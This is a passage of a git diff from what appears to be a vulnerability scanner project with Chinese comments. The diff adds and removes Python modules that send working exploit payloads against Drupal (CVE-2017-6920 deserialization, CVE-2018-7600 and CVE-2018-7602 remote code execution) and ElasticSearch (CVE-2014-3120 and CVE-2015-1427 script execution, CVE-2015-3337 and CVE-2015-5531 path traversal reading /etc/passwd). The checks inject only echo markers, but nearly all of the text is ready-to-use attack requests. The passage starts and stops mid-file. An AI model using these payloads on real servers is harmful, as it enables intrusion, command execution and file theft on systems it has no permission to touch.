+                'data': 'config_type=system.simple&config_name={CONFIGNAME}&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token={TOKEN}&form_id=config_single_import_form&op=Import'
+            },
+            {
+                'path': 'development/configuration/single/import',
+                'data': 'config_type=system.simple&config_name={CONFIGNAME}&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token={TOKEN}&form_id=config_single_import_form&op=Import'
+            },
+            {
+                'path': 'configuration/single/import',
+                'data': 'config_type=system.simple&config_name={CONFIGNAME}&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token={TOKEN}&form_id=config_single_import_form&op=Import'
+            },
+            {
+                'path': 'single/import',
+                'data': 'config_type=system.simple&config_name={CONFIGNAME}&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token={TOKEN}&form_id=config_single_import_form&op=Import'
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Drupal',
+            'vul_type': 'unSerialize/RCE',
+            'vul_id': 'CVE-2017-6920',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data']
+
+            form_token = get_form_token(client, path, vul_info)
+            if (form_token):
+                random_name = random_md5(6)
+                data = data.format(CONFIGNAME=random_name, TOKEN=form_token)
+            else:
+                return None
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (('PHP Version' in res.text) and ('PHP License' in res.text)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Drupal/drupal-cve-2018-7600-rce.py b/payloads/Drupal/drupal-cve-2018-7600-rce.py
new file mode 100644
index 0000000..d0314d5
--- /dev/null
+++ b/payloads/Drupal/drupal-cve-2018-7600-rce.py
@@ -0,0 +1,68 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Drupal Drupalgeddon 2 远程代码执行
+    CVE-2018-7600
+        Payload: https://vulhub.org/#/environments/drupal/CVE-2018-7600/
+
+
+'''
+
+from lib.tool.md5 import random_md5
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax',
+                'data': 'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]={RCECOMMAND}'
+            },
+            {
+                'path': 'register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax',
+                'data': 'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]={RCECOMMAND}'
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Drupal',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2018-7600',
+        }
+
+        for payload in self.payloads:
+            random_str = random_md5(6)
+            RCEcommand = 'echo ' + random_str
+            
+            path = payload['path']
+            data = payload['data'].format(RCECOMMAND=RCEcommand)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res(res.text, random_str)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Drupal/drupal-cve-2018-7602-rce.py b/payloads/Drupal/drupal-cve-2018-7602-rce.py
new file mode 100644
index 0000000..b75e262
--- /dev/null
+++ b/payloads/Drupal/drupal-cve-2018-7602-rce.py
@@ -0,0 +1,96 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Drupal 远程代码执行
+    CVE-2018-7602
+        Payload: https://vulhub.org/#/environments/drupal/CVE-2018-7602/
+
+对URL中的#进行编码两次, 即可绕过sanitize()函数的过滤
+'''
+
+from payloads.Drupal.tool_get_token import get_form_token
+from lib.tool.md5 import random_md5
+from lib.tool import check
+import re
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path-1': '?q=%2Fuser%2F1%2Fcancel',
+                
+                'path-2': '?q=%2Fuser%2F1%2Fcancel&destination=%2Fuser%2F1%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3D',
+                'data-2': 'form_id=user_cancel_confirm_form&form_token={TOKEN}&_triggering_element_name=form_id&op=Cancel+account',
+                
+                'path-3': '?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F',
+                'data-3': 'form_build_id=',
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Drupal',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2018-7602',
+        }
+
+        for payload in self.payloads:
+            path_1 = payload['path-1']
+
+            # todo 1 / 获取 Drupal的Token
+            form_token = get_form_token(client, path_1, vul_info)  # * res1
+            if (form_token):
+                # todo 2 / 命令执行, 并获取 Build id
+                random_str = random_md5(6)
+                RCEcommand = 'echo ' + random_str
+                
+                path_2 = payload['path-2'] + RCEcommand
+                data_2 = payload['data-2'].format(TOKEN=form_token)
+
+                res2 = client.request(
+                    'post',
+                    path_2,
+                    data=data_2,
+                    allow_redirects=False,
+                    vul_info=vul_info
+                )
+                if res2 is None:
+                    continue
+
+                form_build_id = re.search(r'name="form_build_id" value="form-.{43}', res2.text, re.I|re.M|re.U|re.S)
+                if (form_build_id):
+                    # todo 3 / 访问 Build id的路径, 验证回显
+                    buildId = form_build_id.group().replace('name="form_build_id" value="', '')
+
+                    path_3 = payload['path-3'] + buildId
+                    data_3 = payload['data-3'] + buildId
+
+                    res3 = client.request(
+                        'post',
+                        path_3,
+                        data=data_3,
+                        allow_redirects=False,
+                        vul_info=vul_info
+                    )
+                    if res3 is None:
+                        continue
+                
+                    if (check.check_res(res3.text, random_str)):
+                        results = {
+                            'Target': res2.request.url,
+                            'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                            'Request-1': res2,
+                            'Request-2': res3,
+                        }
+                        return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Drupal/main.py b/payloads/Drupal/main.py
deleted file mode 100644
index 69cb083..0000000
--- a/payloads/Drupal/main.py
+++ /dev/null
@@ -1,56 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Drupal是使用PHP语言编写的开源内容管理框架(CMF): https://www.drupal.com/ or https://www.drupal.cn/
-    Drupal扫描类: 
-        1. Drupal Drupalgeddon 2 远程代码执行
-            CVE-2018-7600
-                Payload: https://vulhub.org/#/environments/drupal/CVE-2018-7600/
-
-        2. Drupal < 7.32 Drupalgeddon SQL 注入
-            CVE-2014-3704
-                Payload: https://vulhub.org/#/environments/drupal/CVE-2014-3704/
-
-        3. Drupal Core 8 PECL YAML 反序列化任意代码执行
-            CVE-2017-6920
-                Payload: https://vulhub.org/#/environments/drupal/CVE-2017-6920/
-
-        4. Drupal 远程代码执行
-            CVE-2018-7602
-                Payload: https://vulhub.org/#/environments/drupal/CVE-2018-7602/
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Drupal.tool_get_token import get_form_token
-from payloads.Drupal.cve_2014_3704 import cve_2014_3704_scan
-from payloads.Drupal.cve_2017_6920 import cve_2017_6920_scan
-from payloads.Drupal.cve_2018_7600 import cve_2018_7600_scan
-from payloads.Drupal.cve_2018_7602 import cve_2018_7602_scan
-
-class Drupal():
-    def __init__(self):
-        self.app_name = 'Drupal'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target=self.{}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=self.cve_2014_3704_scan, clients=clients),
-            thread(target=self.cve_2017_6920_scan, clients=clients),
-            thread(target=self.cve_2018_7600_scan, clients=clients),
-            thread(target=self.cve_2018_7602_scan, clients=clients)
-        ]
-
-Drupal.get_form_token = get_form_token
-Drupal.cve_2014_3704_scan = cve_2014_3704_scan
-Drupal.cve_2017_6920_scan = cve_2017_6920_scan
-Drupal.cve_2018_7600_scan = cve_2018_7600_scan
-Drupal.cve_2018_7602_scan = cve_2018_7602_scan
-
-drupal = Drupal()
diff --git a/payloads/Drupal/tool_get_token.py b/payloads/Drupal/tool_get_token.py
index 944ecfc..8202310 100644
--- a/payloads/Drupal/tool_get_token.py
+++ b/payloads/Drupal/tool_get_token.py
@@ -3,7 +3,7 @@
 
 import re
 
-def get_form_token(self, client, path, vul_info):
+def get_form_token(client, path, vul_info):
     ''' 获取drupal的form_token '''
     
     res = client.request(
diff --git a/payloads/ElasticSearch/cve_2014_3120.py b/payloads/ElasticSearch/cve_2014_3120.py
deleted file mode 100644
index 4b70b23..0000000
--- a/payloads/ElasticSearch/cve_2014_3120.py
+++ /dev/null
@@ -1,58 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-from time import sleep
-
-random_name = random_md5()
-
-cve_2014_3120_payloads = [
-    {
-        'path': 'website/blog/',
-        'data': '{"name": "RANDOMNAME"}'.replace('RANDOMNAME', random_name),
-    },
-    {
-        'path': '_search?pretty',
-        'data': '''{"size": 1,"query": {"filtered": {"query": {"match_all": {}}}},"script_fields": {"command": {"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\"RCECOMMAND\\").getInputStream()).useDelimiter(\\"\\\\\\\\A\\").next();"}}}''',
-    }
-]
-
-def cve_2014_3120_scan(clients):
-    ''' 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,
-        而MVEL可执行Java代码, 而且没有沙盒, 所以我们可以直接执行任意代码
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'ElasticSearch',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2014-3120',
-    }
-
-    for payload in cve_2014_3120_payloads:
-        random_str = random_md5(6)
-        RCEcommand = 'echo ' + random_str
-        
-        path = payload['path']
-        data = payload['data'].replace('RCECOMMAND', RCEcommand)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)                                    # * 创建可能有延迟
-        if (check.check_res(res.text, random_str)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ElasticSearch/cve_2015_1427.py b/payloads/ElasticSearch/cve_2015_1427.py
deleted file mode 100644
index fc14996..0000000
--- a/payloads/ElasticSearch/cve_2015_1427.py
+++ /dev/null
@@ -1,58 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-from time import sleep
-
-random_name = random_md5()
-
-cve_2015_1427_payloads = [
-    {
-        'path': 'website/blog/',
-        'data': '{"name": "RANDOMNAME"}'.replace('RANDOMNAME', random_name),
-    },
-    {
-        'path': '_search?pretty',
-        'data': '{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"RCECOMMAND\\").getText()"}}}',
-    }
-]
-
-def cve_2015_1427_scan(clients):
-    ''' ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本, 
-        但显然官方的工作并没有做好, lupin和tang3分别提出了两种执行命令的方法
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'ElasticSearch',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2015-1427',
-    }
-
-    for payload in cve_2015_1427_payloads:
-        random_str = random_md5(6)
-        RCEcommand = 'echo ' + random_str
-        
-        path = payload['path']
-        data = payload['data'].replace('RCECOMMAND', RCEcommand)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)                                    # * 创建可能有延迟
-        if (check.check_res(res.text, random_str)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ElasticSearch/cve_2015_3337.py b/payloads/ElasticSearch/cve_2015_3337.py
deleted file mode 100644
index b7b2026..0000000
--- a/payloads/ElasticSearch/cve_2015_3337.py
+++ /dev/null
@@ -1,48 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2015_3337_payloads = [
-    {'path': '_plugin/{PLUGIN}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'},
-    {'path': '_plugin/{PLUGIN}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\Windows\System32\drivers\etc\hosts'},
-    {'path': '_plugin/{PLUGIN}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts'},
-    # {'path': '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'},
-    # {'path': '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\Windows\System32\drivers\etc\hosts'},
-    # {'path': '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts'},
-]
-
-def cve_2015_3337_scan(clients):
-    ''' 在安装了具有“site”功能的插件以后, 插件目录使用../即可向上跳转, 
-        导致目录穿越漏洞, 可读取任意文件, 没有安装任意插件的elasticsearch不受影响
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'ElasticSearch',
-        'vul_type': 'FileRead',
-        'vul_id': 'CVE-2015-3337',
-    }
-    
-    pluginList = ['head', 'test', 'kopf', 'HQ', 'marvel', 'bigdesk']
-
-    for payload in cve_2015_3337_payloads:
-        for plugin in pluginList:
-            path = payload['path'].format(PLUGIN=plugin)
-
-            res = client.request(
-                'get',
-                path,
-                vul_info=vul_info
-            )
-            if res is None:
-                continue
-
-            if (check.check_res_fileread(res.text)):
-                results = {
-                    'Target': res.request.url,
-                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                    'Request': res
-                }
-                return results
-    return None
diff --git a/payloads/ElasticSearch/cve_2015_5531.py b/payloads/ElasticSearch/cve_2015_5531.py
deleted file mode 100644
index 1995014..0000000
--- a/payloads/ElasticSearch/cve_2015_5531.py
+++ /dev/null
@@ -1,80 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-
-random_name_1 = random_md5()
-random_name_2 = random_md5()
-
-cve_2015_5531_payloads = [
-    {
-        'path-1': '_snapshot/{NAME}'.format(NAME=random_name_1),
-        'data-1': '{"type": "fs","settings": {"location": "/usr/share/elasticsearch/repo/NAME1"}}'.replace('NAME1', random_name_1),
-        
-        'path-2': '_snapshot/{NAME2}'.format(NAME2=random_name_2),
-        'data-2': '{"type": "fs","settings": {"location": "/usr/share/elasticsearch/repo/NAME1/snapshot-backdata"}}'.replace('NAME1', random_name_1),
-        
-        'path-3': '_snapshot/{NAME}/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'.format(NAME=random_name_1),
-    },
-]
-
-def cve_2015_5531_scan(clients):
-    ''' elasticsearch 1.5.1及以前, 无需任何配置即可触发该漏洞; 
-        之后的新版, 配置文件elasticsearch.yml中必须存在path.repo, 该配置值为一个目录, 且该目录必须可写, 
-        等于限制了备份仓库的根位置, 不配置该值, 默认不启动这个功能
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'ElasticSearch',
-        'vul_type': 'FileRead',
-        'vul_id': 'CVE-2015-5531',
-    }
-
-    for payload in cve_2015_5531_payloads:
-        path_1 = payload['path-1']
-        path_2 = payload['path-2']
-        path_3 = payload['path-3']
-        
-        data_1 = payload['data-1']
-        data_2 = payload['data-2']
-        
-        res1 = client.request(
-            'put',
-            path_1,
-            data=data_1,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        
-        res2 = client.request(
-            'put',
-            path_2,
-            data=data_2,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-
-        res3 = client.request(
-            'get',
-            path_3,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res3 is None:
-            continue
-
-        if (('114, 111, 111, 116' in res3.text)
-            and ('Failed to derive' in res3.text)
-        ):
-            results = {
-                'Target': res3.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Info': {
-                    'Decode': 'ASCII decimal encode',
-                    'Decode-Url': 'https://www.qqxiuzi.cn/bianma/ascii.htm'
-                },
-                'Request': res3
-            }
-            return results
-    return None
diff --git a/payloads/ElasticSearch/elasticsearch-cve-2014-3120-rce.py b/payloads/ElasticSearch/elasticsearch-cve-2014-3120-rce.py
new file mode 100644
index 0000000..601d89c
--- /dev/null
+++ b/payloads/ElasticSearch/elasticsearch-cve-2014-3120-rce.py
@@ -0,0 +1,73 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ElasticSearch 命令执行
+    CVE-2014-3120
+        Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/
+
+老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,
+    而MVEL可执行Java代码, 而且没有沙盒, 所以我们可以直接执行任意代码
+'''
+
+from lib.tool.md5 import random_md5
+from lib.tool import check
+from time import sleep
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        random_name = random_md5()
+
+        self.payloads = [
+            {
+                'path': 'website/blog/',
+                'data': '{"name": "RANDOMNAME"}'.replace('RANDOMNAME', random_name),
+            },
+            {
+                'path': '_search?pretty',
+                'data': '''{"size": 1,"query": {"filtered": {"query": {"match_all": {}}}},"script_fields": {"command": {"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\"RCECOMMAND\\").getInputStream()).useDelimiter(\\"\\\\\\\\A\\").next();"}}}''',
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'ElasticSearch',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2014-3120',
+        }
+
+        for payload in self.payloads:
+            random_str = random_md5(6)
+            RCEcommand = 'echo ' + random_str
+            
+            path = payload['path']
+            data = payload['data'].replace('RCECOMMAND', RCEcommand)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            sleep(3)                                    # * 创建可能有延迟
+            if (check.check_res(res.text, random_str)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ElasticSearch/elasticsearch-cve-2015-1427-rce.py b/payloads/ElasticSearch/elasticsearch-cve-2015-1427-rce.py
new file mode 100644
index 0000000..4f830e6
--- /dev/null
+++ b/payloads/ElasticSearch/elasticsearch-cve-2015-1427-rce.py
@@ -0,0 +1,73 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞
+    CVE-2015-1427
+        Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-1427/
+
+ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本, 
+    但显然官方的工作并没有做好, lupin和tang3分别提出了两种执行命令的方法
+'''
+
+from lib.tool.md5 import random_md5
+from lib.tool import check
+from time import sleep
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        random_name = random_md5()
+
+        self.payloads = [
+            {
+                'path': 'website/blog/',
+                'data': '{"name": "RANDOMNAME"}'.replace('RANDOMNAME', random_name),
+            },
+            {
+                'path': '_search?pretty',
+                'data': '{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"RCECOMMAND\\").getText()"}}}',
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'ElasticSearch',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2015-1427',
+        }
+
+        for payload in self.payloads:
+            random_str = random_md5(6)
+            RCEcommand = 'echo ' + random_str
+            
+            path = payload['path']
+            data = payload['data'].replace('RCECOMMAND', RCEcommand)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            sleep(3)                                    # * 创建可能有延迟
+            if (check.check_res(res.text, random_str)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ElasticSearch/elasticsearch-cve-2015-3337-fileread.py b/payloads/ElasticSearch/elasticsearch-cve-2015-3337-fileread.py
new file mode 100644
index 0000000..d8b07d3
--- /dev/null
+++ b/payloads/ElasticSearch/elasticsearch-cve-2015-3337-fileread.py
@@ -0,0 +1,64 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ElasticSearch 目录穿越
+    CVE-2015-3337
+        Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/
+
+在安装了具有“site”功能的插件以后, 插件目录使用../即可向上跳转, 
+    导致目录穿越漏洞, 可读取任意文件, 没有安装任意插件的elasticsearch不受影响
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': '_plugin/{PLUGIN}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'},
+            {'path': '_plugin/{PLUGIN}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\Windows\System32\drivers\etc\hosts'},
+            {'path': '_plugin/{PLUGIN}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts'},
+            # {'path': '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'},
+            # {'path': '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\Windows\System32\drivers\etc\hosts'},
+            # {'path': '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'ElasticSearch',
+            'vul_type': 'FileRead',
+            'vul_id': 'CVE-2015-3337',
+        }
+        
+        pluginList = ['head', 'test', 'kopf', 'HQ', 'marvel', 'bigdesk']
+
+        for payload in self.payloads:
+            for plugin in pluginList:
+                path = payload['path'].format(PLUGIN=plugin)
+
+                res = client.request(
+                    'get',
+                    path,
+                    vul_info=vul_info
+                )
+                if res is None:
+                    continue
+
+                if (check.check_res_fileread(res.text)):
+                    results = {
+                        'Target': res.request.url,
+                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                        'Request': res
+                    }
+                    return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
+
diff --git a/payloads/ElasticSearch/elasticsearch-cve-2015-5531-fileread.py b/payloads/ElasticSearch/elasticsearch-cve-2015-5531-fileread.py
new file mode 100644
index 0000000..e107266
--- /dev/null
+++ b/payloads/ElasticSearch/elasticsearch-cve-2015-5531-fileread.py
@@ -0,0 +1,95 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ElasticSearch 目录穿越
+    CVE-2015-5531
+        Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-5531/
+
+elasticsearch 1.5.1及以前, 无需任何配置即可触发该漏洞; 
+    之后的新版, 配置文件elasticsearch.yml中必须存在path.repo, 该配置值为一个目录, 且该目录必须可写, 
+    等于限制了备份仓库的根位置, 不配置该值, 默认不启动这个功能
+'''
+
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        random_name_1 = random_md5()
+        random_name_2 = random_md5()
+
+        self.payloads = [
+            {
+                'path-1': '_snapshot/{NAME}'.format(NAME=random_name_1),
+                'data-1': '{"type": "fs","settings": {"location": "/usr/share/elasticsearch/repo/NAME1"}}'.replace('NAME1', random_name_1),
+                
+                'path-2': '_snapshot/{NAME2}'.format(NAME2=random_name_2),
+                'data-2': '{"type": "fs","settings": {"location": "/usr/share/elasticsearch/repo/NAME1/snapshot-backdata"}}'.replace('NAME1', random_name_1),
+                
+                'path-3': '_snapshot/{NAME}/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'.format(NAME=random_name_1),
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'ElasticSearch',
+            'vul_type': 'FileRead',
+            'vul_id': 'CVE-2015-5531',
+        }
+
+        for payload in self.payloads:
+            path_1 = payload['path-1']
+            path_2 = payload['path-2']
+            path_3 = payload['path-3']
+            
+            data_1 = payload['data-1']
+            data_2 = payload['data-2']
+            
+            res1 = client.request(
+                'put',
+                path_1,
+                data=data_1,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            
+            res2 = client.request(
+                'put',
+                path_2,
+                data=data_2,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+
+            res3 = client.request(
+                'get',
+                path_3,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res3 is None:
+                continue
+
+            if (('114, 111, 111, 116' in res3.text)
+                and ('Failed to derive' in res3.text)
+            ):
+                results = {
